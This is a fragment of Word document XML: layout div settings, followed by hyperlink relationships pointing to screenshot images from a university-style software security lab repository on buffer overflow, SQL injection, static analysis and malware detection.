                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1924876861">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="458694884">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2022075881">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="119999287">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="952438569">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="780224040">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="178351466">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="1739859513">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1361083103">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="385375517">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="161630039">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1799638342">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="1545487248">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="768547932">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1810440014">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="409349983">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="457525957">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="718238794">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1565067455">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="533229836">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1072628824">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="419957160">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2052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4162">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1217820438">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1233080363">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1260718133">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1287468945">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1264729991">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1368993000">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1372727317">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="280575423">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1383947444">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1409767940">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1525440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258">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1532694191">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1555461644">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1586454570">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1623070074">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1628269994">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1667634223">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1704013851">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1707171496">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1982885301">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1855193189">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1885601937">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1002706545">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1921057144">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1944872046">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1271861612">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1967613728">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2042315441">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="551186967">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2063406771">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="991182775">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2076312970">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="24703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galateo/Software-Security-Labs/blob/main/Laboratori/4%20StaticAnalysis/screen%20static%20analisys/Schermata%202023-06-30%20alle%2012.50.05.png" TargetMode="External"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/7%20Malware%20Detection/screen/snort/Schermata%202023-07-05%20alle%2010.14.04.png" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/1%20Buffer-Overflow/Screen/fase2/Acquisizione%20schermata%2021.03.2023%20alle%2020.01.21%20%5B1%5D.png?token=GHSAT0AAAAAACAK7DHEJHO43ZHFXKQNXYVYZBEXVBQ" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/mgalateo/Software-Security-Labs/main/Laboratori/2%20Web-Security/Screen/screen%20sql%20inj/4/Acquisizione%20schermata%2027.04.2023%20alle%2016.37.00%20%5B1%5D.png" TargetMode="External"/><Relationship Id="rId159" 